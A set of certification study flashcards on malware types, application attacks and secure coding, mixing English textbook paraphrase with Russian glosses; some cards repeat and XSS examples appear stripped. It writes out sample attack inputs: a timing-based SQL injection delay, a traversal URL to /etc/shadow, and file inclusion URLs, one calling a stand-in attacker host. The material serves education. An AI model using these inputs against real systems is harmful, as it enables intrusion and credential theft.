Domain 8. Chapter 21

Question 1

Domain 8. Chapter 21
1. Malware
2. Malware prevention
3. Application Attacks
4. Injection Vulnerabilities
5. Exploiting Authorization Vulnerabilities
6. Exploiting Web Application Vulnerabilities
7. Application Security Controls
8. Secure Coding Practices

Question 2

1. Malware
   The script kiddie—the malicious individual who doesn’t understand the technology behind security vulnerabilities but downloads ready-to-use software (or scripts) from the internet and uses them to launch attacks against remote systems.
   The advanced persistent threat (APT) - are sophisticated adversaries with advanced technical skills and significant financial resources.

Question 3

1.1 Viruses
Like biological viruses, computer viruses have two main functions—propagation and payload execution распространение и выполнение полезной нагрузки.

1.1.1 Virus Propagation Techniques
- Master Boot Record Viruses MBR These viruses attack the MBR—the portion of bootable media (such as a hard disk or flash drive) that the computer uses to load the operating system during the boot process. Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users. If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory, infects the MBR on the target system’s hard drive, and spreads its infection to yet another machine.
- File Infector Viruses
Many viruses infect different types of executable files and trigger when the operating system attempts to execute them. For Windows-based systems, file infector viruses commonly affect executable files and scripts, such as those ending with .exe, .com, and .msc extensions. Standard file infector viruses that do not use cloaking techniques such as stealth or encryption (see the section “Virus Technologies,” later in this chapter) are often easily detected by comparing file characteristics (such as size and modification date) before and after infection or by comparing hash values.
A variation of the file infector virus is the companion virus. These viruses are self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file.
- Macro Viruses
Visual Basic for Applications (VBA) programming language, scripting functionality to assist with the automation of repetitive tasks. Macros.
- Service Injection Viruses - other technique to infect systems and escape detection—injecting themselves into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe, and explorer.exe.
One of the best techniques to protect systems against service injection is to ensure that all software allowing the viewing of web content (browsers, media players, helper applications) receives current security patches.

Question 4

1.1.2 Virus Technologies
This section examines four specific types of viruses that use sneaky techniques in an attempt to escape detection:
- Multipartite Viruses Многочастные вирусы Multipartite viruses use more than one propagation technique in an attempt to penetrate systems that defend against only one method or the other.
- Stealth Viruses Stealth viruses hide themselves by actually tampering вмешиваясь в with the operating system to fool antivirus packages into thinking that everything is functioning normally.
- Polymorphic Viruses Polymorphic viruses actually modify their own code as they travel from system to system.
- Encrypted Viruses Encrypted viruses use cryptographic techniques to avoid detection. However, they do not generate these modified signatures by changing their code; instead, they alter the way they are stored on the disk.

Question 5

1.1.3 Hoaxes мистификациями
Virus hoaxes - is the message that warns of “the latest virus threat roaming the internet”.

Question 6

1.2 Logic Bombs
Logic bombs are malicious code objects that infect a system and lie dormant until лежать в спячке they are triggered by the occurrence of one or more conditions such as time, program launch, website logon, certain keystrokes, and so on.

Question 7

1.4 Trojan Horses
A Trojan horse—a software program that appears benevolent but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network.
Remote access Trojans (RATs) are a subcategory of Trojans that open backdoors in systems that grant the attacker remote administrative control of the infected system.
Cryptomalware. Trojans are designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies.

Question 8

1.5 Worms
Worms pose a significant risk to network security. They contain the same destructive potential as other malicious code objects with an added twist—they propagate themselves without requiring any human intervention.

• Code Red Worm spread among web servers running unpatched versions of Microsoft’s Internet Information Server (IIS) in 2001. 1) It randomly selected hundreds of Internet Protocol (IP) addresses and then probed those addresses to see whether they were used by hosts running a vulnerable version of IIS. 2) It defaced HTML pages on the local web server. 3) It planted a logic bomb that would initiate a denial-of-service attack against the IP address 198.137.240.91, which at that time belonged to the web server hosting the White House’s home page.

-Stuxnet
In mid-2010, a worm named Stuxnet surfaced on the internet.
Stuxnet uses the following propagation techniques:
- Searching for unprotected administrative shares of systems on the local network
- Exploiting zero-day vulnerabilities in the Windows Server service and Windows Print Spooler service
- Connecting to systems using a default database password
- Spreading by the use of shared infected USB drives.

While Stuxnet spread from system to system with impunity, it was actually searching for a very specific type of system—one using a controller manufactured by Siemens and allegedly used in the production of material for nuclear weapons. When it found such a system, it executed a series of actions designed to destroy centrifuges attached to the Siemens controller.

Stuxnet appeared to begin its spread in the Middle East, specifically on systems located in Iran.

Question 9

1.6 Spyware and Adware Шпионское и рекламное ПО
Spyware monitors your actions and transmits important details to a remote system that spies on your activity. For example, spyware might wait for you to log into a banking website and then transmit your username and password to the creator of the spyware. Alternatively, it might wait for you to enter your credit card number on an ecommerce site and transmit it to a fraudster to resell on the black market.

Adware, while quite similar to spyware in form, has a different purpose. It uses a variety of techniques to display advertisements on infected computers. The simplest forms of adware display pop-up ads всплывающие окна с рекламой on your screen while you surf the web. More nefarious гнусные versions may monitor your shopping behavior and redirect you to competitor websites.

Both spyware and adware fit into a category of software known as potentially unwanted programs (PUPs),

Question 10

1.7 Ransomware Вирус-вымогатель
Ransomware is a type of malware that weaponizes cryptography. After infecting a system through many of the same techniques used by other types of malware, ransomware then generates an encryption key known only to the ransomware author and uses that key to encrypt critical files on the system’s hard drive and any mounted drives. This encryption renders the data inaccessible to the authorized user or anyone else other than the malware author.
The user is then presented with a message notifying them that their files were encrypted and demanding payment of a ransom и требующее уплаты выкупа before a specific deadline to prevent the files from becoming permanently inaccessible. Some attackers go further and threaten that they will publicly release sensitive information if the ransom is not paid.

Question 11

1.8 Malicious Scripts
It’s not uncommon to find libraries of scripts written in languages such as PowerShell and Bash that execute sequences of command-line instructions in a highly automated fashion режиме. For example, an administrator might write a PowerShell script that runs on a Windows domain each time a new user is added to the organization.
Unfortunately, this same scripting technology is available to improve the efficiency of malicious actors. For example, they might have a PowerShell script to run each time they gain access to a new Windows system that attempts a series of privilege escalation attacks.
Malicious scripts are also commonly found in a class of malware known as fileless malware.
For example, a user might receive a malicious link in a phishing message. That link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload.

Question 12

1.9 Zero-Day Attacks
Many forms of malicious code take advantage of zero-day vulnerabilities, security flaws discovered by hackers that have not been thoroughly addressed by the security community.
There are two main reasons systems are affected by these vulnerabilities:
- The necessary delay between the discovery of a new type of malicious code and the issuance of patches and antivirus updates. This is known as the window of vulnerability.
- Slowness in applying updates on the part of system administrators.

Question 13

2. Malware Prevention
   2.1 Antimalware Software
   83 percent of malware in existence targets the Windows platform.
   Signature-based detection to identify potential virus infections on a system with a database that contains the telltale характерные characteristics of all known viruses.
   - If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition.
   - If the software recognizes the virus but doesn’t know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually.
   - If security settings/policies do not provide for quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity.

Heuristic mechanisms. These methods analyze the behavior of software, looking for the telltale signs of virus activity, such as attempts to elevate privilege level, cover their electronic tracks, and alter unrelated or operating system files. A common strategy is for systems to quarantine suspicious files and send them to a malware analysis tool, where they are executed in an isolated but monitored environment. If the software behaves suspiciously in that environment, it is added to blacklists throughout the organization, rapidly updating antivirus signatures to meet new threats.

Question 14

2.2 Integrity Monitoring
file integrity monitoring tools, also provide a secondary antivirus functionality. These tools are designed to alert administrators to unauthorized file modifications. These systems work by maintaining a database of hash values for all files stored on the system. hese archived hash values are then compared to current computed values to detect any files that were modified between the two periods.

Question 15

2.3 Advanced Threat Protection
Endpoint detection and response (EDR). They combine the antimalware capabilities found in traditional antivirus packages with advanced techniques designed to better detect threats and take steps to eradicate them. Some of the specific capabilities of EDR packages are as follows:
- Analyzing endpoint memory, filesystem, and network activity for signs of malicious activity
- Automatically isolating possible malicious activity to contain the potential damage
- Integration with threat intelligence sources to obtain real-time insight into malicious behavior elsewhere on the internet
- Integration with other incident response mechanisms to automate response efforts.

Many security vendors offer EDR capabilities as a managed service offering where they provide installation, configuration, and monitoring services to reduce the load on customer security teams. These managed EDR offerings are known as managed detection and response (MDR) services.

User and entity behavior analytics (UEBA) packages pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual’s normal activity and then highlighting deviations from that profile that may indicate a potential compromise. UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint.

Question 16

3. Application Attacks
   The specific techniques that attackers use to exploit vulnerabilities left behind by sloppy небрежно coding practices.
   3.1 Buffer Overflows
   Buffer overflow vulnerabilities exist when a developer does not properly validate user input to ensure that it is of an appropriate size. Input that is too large can “overflow” a data structure to affect other data stored in the computer’s memory.
   In the worst case, that data can be used to overwrite system commands, allowing an attacker to exploit the buffer overflow vulnerability to execute targeted commands on the server.
   Any time a program variable allows user input, the programmer should take steps to ensure that each of the following conditions is met:
   - The user can’t enter a value longer than the size of any buffer that will hold it (for example, a 10-letter word into a 5-letter string variable).
   - The user can’t enter an invalid value for the variable types that will hold it (for example, a letter into a numeric variable).
   - The user can’t enter a value that will cause the program to operate outside its specified parameters (for example, answer a “yes” or “no” question with “maybe”).

Question 17

3.2 Time of Check to Time of Use
Attackers can develop attacks based on the predictability of task execution.
The time of check (TOC) is the time at which the subject checks on the status of the object.
When the decision is made to access the object, the procedure accesses it at the time of use (TOU).
he difference between the TOC and the TOU is sometimes large enough for an attacker to replace the original object with another object that suits their own needs. Time of check to time of use (TOCTTOU or TOC/TOU) attacks are often called race conditions because the attacker is racing with the legitimate process to replace the object before it is used.
These attacks must be addressed in your security policy and in your security model. TOCTTOU attacks, race condition exploits, and communication disconnects are known as state attacks because they attack timing, data flow control, and transition between one system state to another.

Question 18

3.3 Backdoors
Backdoors are undocumented command sequences that allow individuals with knowledge of the backdoor to bypass normal access restrictions. They are often used during the development and debugging process to speed up the workflow and avoid forcing developers to continuously authenticate to the system.

Question 19

3.4 Privilege Escalation and Rootkits
Privilege escalation attacks - expanding access from the normal user account to more comprehensive, administrative access. Through the use of rootkits. Rootkits are freely available on the internet and exploit known vulnerabilities in various operating systems. Privilege escalation attacks may also be waged using fileless malware, malicious scripts, or other attack vectors. Administrators must keep themselves informed about new security patches released for operating systems used in their environment and apply these corrective measures consistently.

Question 20

4. Injection Vulnerabilities
   Injection vulnerabilities are among the primary mechanisms that attackers use to break through a web application and gain access to the systems supporting that application. These vulnerabilities allow an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute.

Question 21

4.1 SQL Injection Attacks
Web applications often receive input from users and use it to compose a database query that provides results that are sent back to a user.
SQL injection attacks may also be used to execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases.
Attackers use a technique called blind SQL injection to conduct an attack even when they don’t have the ability to view the results directly. We’ll discuss two forms of blind SQL injection: content-based and timing-based.

Question 22

4.1.1Blind Content-Based SQL Injection
In a content-based blind SQL injection attack, the perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack.

Answer 22

При атаке со слепым внедрением SQL-кода на основе контента злоумышленник отправляет входные данные в веб-приложение, которое проверяет, интерпретирует ли приложение внедренный код, прежде чем пытаться осуществить атаку.

Question 23

4.1.2 Blind Timing-Based SQL Injection
In addition to using the content returned by an application to assess susceptibility to blind SQL injection attacks, penetration testers may use the amount of time required to process a query as a channel for retrieving information from a database. Command “WAITFOR DELAY ‘00:00:15’ “
This would instruct the database to wait 15 seconds before performing the next action.

This might seem like a strange attack, but it can actually be used to extract information from the database. For example, imagine that the Accounts database table used in the previous example contains an unencrypted field named Password. An attacker could use a timing-based attack to discover the password by checking it letter by letter.

Question 24

4.2 Code Injection Attacks
SQL injection attacks are a specific example of a general class of attacks known as code injection attacks.
Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack.
For example, attackers might embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query, conducting a LDAP injection attack. In this type of injection attack, the focus of the attack is on the back end of an LDAP directory service rather than a database server. If a web server front end uses a script to craft LDAP statements based on input from a user, then LDAP injection is potentially a threat. Just as with SQL injection, validation and escaping of input and defensive coding проверка и экранирование ввода и защитное кодирование are essential to eliminate this threat.

XML injection is another type of injection attack, where the back-end target is an XML application. Again, input escaping and validation combats this threat. Commands may even attempt to load dynamically linked libraries (DLLs) containing malicious code in a DLL injection attack.

Cross-site scripting is an example of a code injection attack.

Question 25

4.3 Command Injection Attacks
In some cases, application code may reach back to the operating system to execute a command. This is especially dangerous because an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system.

Question 26

5. Exploiting Authorization Vulnerabilities
   5.1 Insecure Direct Object References
   In some cases, web developers design an application to directly retrieve information from a database based on an argument provided by the user in either a query string or a POST request.
   https://www.[companyname].com/getDocument.php?documentID=1842
   The reason for this is that an attacker can easily view this URL and then modify it to attempt to retrieve other documents, such as in these examples:
   https://www.mycompany.com/getDocument.php?documentID=1841…
   If the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority. This situation is known as an insecure direct object reference.

Question 27

5.2 Directory Traversal Обход каталога
These directory traversal attacks work when web servers allow the inclusion of operators that navigate directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server.
Apache web server that stores web content in the directory path /var/www/html/
/var/www/html/ -> /etc/shadow
http://www.mycompany.com/../../../etc/shadow

Question 28

5.3 File Inclusion Включение файлов
File inclusion attacks take directory traversal to the next level. Instead of simply retrieving a file from the local operating system and displaying it to the attacker, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code.
- Local file inclusion attacks seek to execute code stored in a file located elsewhere on the web server. They work in a manner very similar to a directory traversal attack. For example, an attacker might use the following URL to execute a file named attack.exe that is stored in the C:\www\uploads directory on a Windows server: http://www.mycompany.com/app.php?include=C:\www\uploads\attack.exe
- Remote file inclusion attacks allow the attacker to go a step further and execute code that is stored on a remote server. These attacks are especially dangerous because the attacker can directly control the code being executed without having to first store a file on the local server. For example, an attacker might use this URL to execute an attack file stored on a remote server: http://www.mycompany.com/app.php?include=http://evil.attacker.com/

Question 29

6. Exploiting Web Application Vulnerabilities
   Web applications are complex ecosystems consisting of application code, web platforms, operating systems, databases, and interconnected application programming interfaces (APIs). The complexity of these environments, combined with the fact that they are often public-facing, makes many different types of attacks possible and provides fertile ground for penetration testers.
   6.1 Cross-Site Scripting (XSS)
   Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page.
   6.1.1 Reflected XSS
   XSS attacks commonly occur when an application allows reflected input отраженный ввод. Inserting

    into text box.  
    The key to this attack is that it's possible to embed form input in a link. A malicious individual could create a web page with a link titled “Check your account at First Bank” and encode form input in the link. When the user visits the link, the web page appears to be an authentic First Bank website (because it is!) with the proper address in the toolbar and a valid digital certificate. However, the website would then execute the script included in the input by the malicious user, which appears to be part of the valid web page.
   What's the answer to cross-site scripting? 
   -When creating web applications that allow any type of user input, developers must be sure to perform input validation.
   -Output encoding is a set of related techniques that take user-supplied input and encode it using a series of rules that transform potentially dangerous content into a safe form.

Question 30

6.1.1 Reflected XSS
XSS attacks commonly occur when an application allows reflected input отраженный ввод. Inserting

 into text box.  
 The key to this attack is that it's possible to embed form input in a link. A malicious individual could create a web page with a link titled “Check your account at First Bank” and encode form input in the link. When the user visits the link, the web page appears to be an authentic First Bank website (because it is!) with the proper address in the toolbar and a valid digital certificate. However, the website would then execute the script included in the input by the malicious user, which appears to be part of the valid web page.
What's the answer to cross-site scripting? 
-When creating web applications that allow any type of user input, developers must be sure to perform input validation.
-Output encoding is a set of related techniques that take user-supplied input and encode it using a series of rules that transform potentially dangerous content into a safe form.

Question 31

6.1.2 Stored/Persistent постоянный XSS
Another common technique is to store cross-site scripting code on a remote web server in an approach known as stored XSS. These attacks are described as persistent, because they remain on the server even when the attacker isn’t actively waging an attack.
When the attacker inserts the malicious code

 in the insert text area in public sites. And this text is keeped on the site.

Question 32

6.2 Request Forgery Запросить подделку
Request forgery attacks exploit trust relationships and attempt to have users unwittingly execute commands невольно выполнять команды against a remote server. They come in two forms: cross-site request forgery and server-side request forgery.

Question 33

6.2.1 Cross-Site Request Forgery (CSRF/XSRF)
Cross-site request forgery attacks, abbreviated as XSRF or CSRF attacks, are similar to cross-site scripting attacks but exploit a different trust relationship. XSS attacks exploit the trust that a user has in a website to execute code on the user’s computer.
Consider, for example, an online banking site. An attacker who wants to steal funds from user accounts might go to an online forum and post a message containing a link. That link actually goes directly into the money transfer site that issues a command to transfer funds to the attacker’s account. The attacker then leaves the link posted on the forum and waits for an unsuspecting user to come along and click the link. If the user happens to be logged into the banking site, the transfer succeeds.

Question 34

6.2.2 Server-Side Request Forgery (SSRF)
Server-side request forgery (SSRF) attacks exploit a similar vulnerability but instead of tricking a user’s browser into visiting a URL, they trick a server into visiting a URL based on user-supplied input. SSRF attacks are possible when a web application accepts URLs from a user as input and then retrieves information from that URL. If the server has access to non-public URLs, an SSRF attack can unintentionally disclose that information to an attacker.

Question 35

6.3 Session Hijacking
Session hijacking attacks occur when a malicious individual intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user. The following list includes some common techniques:
- Capturing details of the authentication between a client and server and using those details to assume the client’s identity
- Tricking the client into thinking the attacker’s system is the server, acting as the intermediary as the client sets up a legitimate connection with the server, and then disconnecting the client
- Accessing a web application using the cookie data of a user who did not properly close the connection or of a poorly designed application that does not properly manage authentication cookies
- All of these techniques can have disastrous results for the end user and must be addressed with both administrative controls (such as anti-replay authentication techniques) and application controls (such as expiring cookies within a reasonable period of time).

Question 36

7. Application Security Controls

Question 37

7.1 Input Validation
Applications that allow user input should perform validation of that input to reduce the likelihood that it contains an attack.
The most effective form of input validation uses input whitelisting (also known as allow listing), in which the developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers.
It would be difficult to write logical rules that describe all valid submissions to that field that would also prevent the insertion of malicious code. In this case, developers might use input blacklisting (also known as block listing) to control user input. With this approach, developers do not try to explicitly describe acceptable input but instead describe potentially malicious input that must be blocked.

Question 38

7.2 Web Application Firewalls
The reality is that applications still sometimes contain injection flaws. This can occur when developer testing is insufficient or when vendors do not promptly supply patches to vulnerable applications.
A WAF sits in front of a web server and receives all network traffic headed to that server. It then scrutinizes тщательно проверяет the input headed to the application, performing input validation (whitelisting and/or blacklisting) before passing the input to the web server. This prevents malicious traffic from ever reaching the web server and acts as an important component of a layered defense against web application vulnerabilities.

Question 39

7.3 Database Security

Question 40

7.3.1Parameterized Queries and Stored Procedures
Database Security
Secure applications depend on secure databases to provide the content and transaction processing necessary to support business operations. Relational databases form the core of most modern applications, and securing these databases goes beyond just protecting them against SQL injection attacks. Cybersecurity professionals should have a strong understanding of secure database administration practices.
Stored procedures work in a similar manner, but the major difference is that the SQL code is not contained within the application but is stored on the database server. The client does not directly send SQL code to the database server. Instead, the client sends arguments to the server, which then inserts those arguments into a precompiled query template. This approach protects against injection attacks and also improves database performance.

Question 41

7.3.2 Obfuscation and Camouflage
Database administrators should take the following measures to protect against data exposure:
-Data minimization is the best defense. Organizations should not collect sensitive information that they don’t need and should dispose удалять of any sensitive information that they do collect as soon as it is no longer needed for a legitimate business purpose.
- Tokenization replaces personal identifiers that might directly reveal an individual’s identity with a unique identifier using a lookup table таблицы поиска. For example, we might replace a widely known value, such as a student ID, with a randomly generated 10-digit number.
- Hashing uses a cryptographic hash function to replace sensitive identifiers with an irreversible необратимым alternative identifier. Salting these values with a random number prior to hashing them makes these hashed values resistant to a type of attack known as a rainbow table attack.

Question 42

7.4 Code Security

Question 43

7.4.1 Code Signing
Code signing provides developers with a way to confirm the authenticity of their code to end users. Developers use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer’s public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals. In cases where there is a lack of code signing, users may inadvertently run inauthentic code.

Question 44

7.4.2 Code Reuse
Many organizations reuse code not only internally but by making use of third-party software libraries and software development kits (SDKs).Third-party software libraries are a very common way to share code among developers.
Organizations trying to make libraries more accessible to developers often publish SDKs. SDKs are collections of software libraries combined with documentation, examples, and other resources designed to help programmers get up and running quickly in a development environment. SDKs also often include specialized utilities designed to help developers design and test code.
t’s fairly common for security flaws to arise in shared code, making it extremely important to know these dependencies and remain vigilant бдительность about security updates.

Question 45

7.4.3 Software Diversity
Security professionals should watch for places in the organization that are dependent on a single piece of source code, binary executable files, or compiler. Although it may not be possible to eliminate all of these dependencies, tracking them is a critical part of maintaining a secure codebase.

Question 46

7.4.4 Code Repositories
Code repositories are centralized locations for the storage and management of application source code. The main purpose of a code repository is to store the source files used in software development in a centralized location that allows for secure storage and the coordination of changes among multiple developers.

Code repositories also perform version control, allowing the tracking of changes and the rollback of code to earlier versions when required. They also meet the needs of security and auditing professionals who want to ensure that software development includes automated auditing and logging of changes. Code repositories also help avoid the problem of dead code, where code is in use in an organization but nobody is responsible for the maintenance of that code and, in fact, nobody may even know where the original source files reside.

Question 47

7.4.5 Integrity Measurement
Cybersecurity teams should also work hand in hand with developers and operations teams to ensure that applications are provisioned and deprovisioned подготавливаются и отключаются in a secure manner through the organization’s approved release management process.

This process should include code integrity measurement. Code integrity measurement uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved. Any deviation отклонение in hash values indicates that code was modified, either intentionally or unintentionally, and requires further investigation prior to release.

Question 48

7.4.6 Application Resilience
When we design applications, we should create them in a manner that makes them resilient in the face of changing demand. We do this through the application of two related principles:
- Scalability says that applications should be designed so that computing resources they require may be incrementally added to support increasing demand. This may include adding more resources to an existing computing instance, which is known as vertical scaling or “scaling up.” It may also include adding additional instances to a pool, which is known as horizontal scaling, or “scaling out.”
- Elasticity goes a step further than scalability and says that applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when they are no longer needed. You can think of elasticity as the ability to scale both up and down on an as-needed basis.

Question 49

8. Secure Coding Practices
   8.1 Source Code Comments
   Developers should take steps to ensure that commented versions of their code remain secret. In the case of compiled executables, this is unnecessary, because the compiler automatically removes comments from executable files.

Question 50

8.2 Error Handling
Developers must anticipate unexpected situations and write error handling code that steps in and handles these situations in a secure fashion. Improper error handling may expose code to unacceptable levels of risk.

Many programming languages include try…catch functionality that allows developers to explicitly specify how errors should be handled. In this approach, the developer writes code that may cause an error and includes it in a try clause. When the code executes, if it does cause an error, the catch clause specifies how the application should handle that error situation.

Question 51

8.3 Hard-Coded Credentials
In some cases, developers may include usernames and passwords in source code. There are two variations on this error. First, the developer may create a hard-coded maintenance account for the application that allows the developer to regain access even if the authentication system fails. This is known as a backdoor.

The second variation of hard-coding credentials occurs when developers include access credentials for other services within their source code. If that code is intentionally or accidentally disclosed, those credentials then become known to outsiders.
This occurs quite often when developers accidentally publish code into a public code repository, such as GitHub, that contains API keys or other hard-coded credentials.

Question 52

8.4 Memory Management

Question 53

8.4.1Resource Exhaustion истощение
Whether intentional or accidental, systems may consume all of the memory, storage, processing time, or other resources available on the system, rendering делая it disabled or crippled for other uses. This is resource exhaustion.
Memory leaks are one example of resource exhaustion.
f an application requests memory from the operating system, it will eventually no longer need that memory and should then return the memory to the operating system for other uses. In the case of an application with a memory leak, the application fails to return some memory that it no longer needs, perhaps by simply losing track of an object that it has written to a reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all of the memory available to the system, causing it to crash. Rebooting the system often resets the problem, returning the memory to other uses, but if the memory leak isn’t corrected, the cycle simply begins anew.

Question 54

8.4.2 Pointer Dereferencing Разыменование указателя
Memory pointers can also cause security issues. Pointers are a commonly used concept in application development. They are an area of memory that stores an address of another location in memory.
One particular issue that might arise is if the pointer is empty, containing what programmers call a NULL value. If the application tries to dereference this NULL pointer, it causes a condition known as a null pointer exception. In the best case, a NULL pointer exception causes the program to crash, providing an attacker with access to debugging information that may be used for reconnaissance of the application’s security. In the worst case, a NULL pointer exception may allow an attacker to bypass security controls. Security professionals should work with application developers to help them avoid these issues.